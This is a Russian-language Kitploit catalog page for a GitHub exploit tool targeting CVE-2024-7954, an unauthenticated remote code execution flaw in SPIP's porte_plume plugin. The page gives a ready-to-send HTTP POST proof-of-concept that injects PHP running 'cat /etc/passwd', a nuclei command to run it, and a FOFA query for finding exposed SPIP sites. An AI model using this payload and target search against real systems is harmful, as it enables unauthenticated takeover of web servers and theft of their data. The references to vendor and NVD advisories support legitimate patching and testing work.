Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-7954-RCE — Удаленное выполнение кода без аутентификации в SPIP версии до 4.2.12 включительно | Kitploit
Инструменты/GitHubGitHub/gh-ost00/cve-2024-7954-rce
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubgh-ost00/cve-2024-7954-rce

CVE-2024-7954-RCE

Удаленное выполнение кода без аутентификации в SPIP версии до 4.2.12 включительно

Репозиторий
921 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Описание

Плагин porte_plume, используемый в SPIP до версий 4.30-alpha2, 4.2.13 и 4.1.16, уязвим для выполнения произвольного кода. Удаленный неаутентифицированный злоумышленник может выполнить произвольный PHP-код от имени пользователя SPIP, отправив специально сформированный HTTP-запрос.

Эксплойт (доказательство концепции)

root@kitploit:~
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB

Использование

root@kitploit:~
nuclei --target {host.com} -t CVE-2024-7954.yaml

Запрос FOFA

root@kitploit:~
app="SPIP"

Ссылки

  • https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-0-alpha2-SPIP-4-2-13-SPIP-4.html
  • https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_1_the_feather/
  • https://vulncheck.com/advisories/spip-porte-plume
  • https://nvd.nist.gov/vuln/detail/CVE-2024-7954
  • https://security-tracker.debian.org/tracker/CVE-2024-7954
Скачать инструмент